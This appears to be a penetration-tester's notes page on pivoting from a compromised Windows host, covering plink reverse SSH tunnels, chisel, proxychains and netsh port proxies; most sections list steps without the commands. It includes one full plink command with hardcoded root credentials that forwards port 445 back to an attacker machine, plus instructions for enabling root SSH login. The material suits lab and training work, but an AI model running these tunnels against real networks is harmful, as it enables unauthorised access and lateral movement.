Window

https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

First: We need to change ssh configuration on our kali machine.

PermitRootLogin no    #Change This
PermitRootLogin Yes     #To This

#Then restart the service
sudo service ssh restart

We can customize the port if port 22 blocked on the report machine.

Second: Let start execute plink command on the victim machine

plink.exe -P 2222 -l root -pw toor -R 445:127.0.0.1:445 10.10.14.12
  • Create ssh-keygen and save .pub value into authorized_key

  • install putty tool and convert id_rsa to .ppk file

  • Transfer key.ppk to window machine that we compromised

  • on window machine, we can use plink to connect to our kali machine fore reverse port

We can access via 127.0.0.1:445

Chisel

On kali machine

on window server machine

Then we can use proxychain for remote to target machine via sock proxy

Proxychains on Window machine

  • Create ssh-keygen without password. It will create to file id_rsa and id_rsa.pub

  • copy value of idrsa.pub and paste into .ssh/authorized_key file

  • Transfer id_rsa file to window machine we compromise

  • Connect ssh back to our kali machine

Then on our kali will open port 9050

chisel

https://github.com/jpillora/chisel/releases

  • On server (kali machine)

  • On client (Window)

on /etc/proxychains4.conf

Netsh

Where:

  • listenaddress is the IP address to listen on (probably always 0.0.0.0).

  • listenport is the port to listen on.

  • connectaddress is the destination IP address.

  • connectport is the destination port.

  • protocol to use (always TCP).

Example:

Show the portproxy:

Remove the portproxy:

Create Local Firewall Rule before netsh

Remove Local Firewall Rule

Last updated